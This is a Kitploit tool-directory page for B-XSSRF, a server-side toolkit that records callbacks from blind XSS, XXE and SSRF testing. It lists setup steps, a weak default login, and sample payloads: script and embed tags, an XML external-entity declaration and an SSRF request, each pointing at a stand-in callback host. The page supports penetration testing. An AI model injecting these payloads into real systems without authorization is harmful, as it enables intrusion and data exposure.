Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
B-XSSRF — Toolkit to detect and keep track on Blind XSS, XXE & SSRF | Kitploit
Tools/GitHubGitHub/spidermate/b-xssrf
Vulnerability ScannersWeb SecurityPenetration Testing
GitHubspidermate/b-xssrf

B-XSSRF

Toolkit to detect and keep track on Blind XSS, XXE & SSRF

View Repository
3457937 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share


B-XSSRF
B-XSSRF

Toolkit to detect and keep track on Blind XSS, XXE & SSRF

B-XSSRF

SETUP

Download Tool
  • Upload the files to your server.
  • Create a Database and upload database.sql file to it.
  • Change the DB Credentials in db.php file.
  • Ready.
  • USAGE

    BLIND XSS

    root@kitploit:~
    <embed src="http://mysite.com/bxssrf/request.php">
    <script src="http://mysite.com/bxssrf/request.php">
    

    BLIND XXE

    root@kitploit:~
    <?xml version="1.0" ?>
    <!DOCTYPE root [
    <!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
    ]>
    <r></r>
    

    SSRF

    root@kitploit:~
    GET /testssrf.php=http://mysite.com/bxssrf/request.php
    
    

    DEFAULT CREDENTIALS

    root@kitploit:~
    USER : [email protected]
    PASS : 123456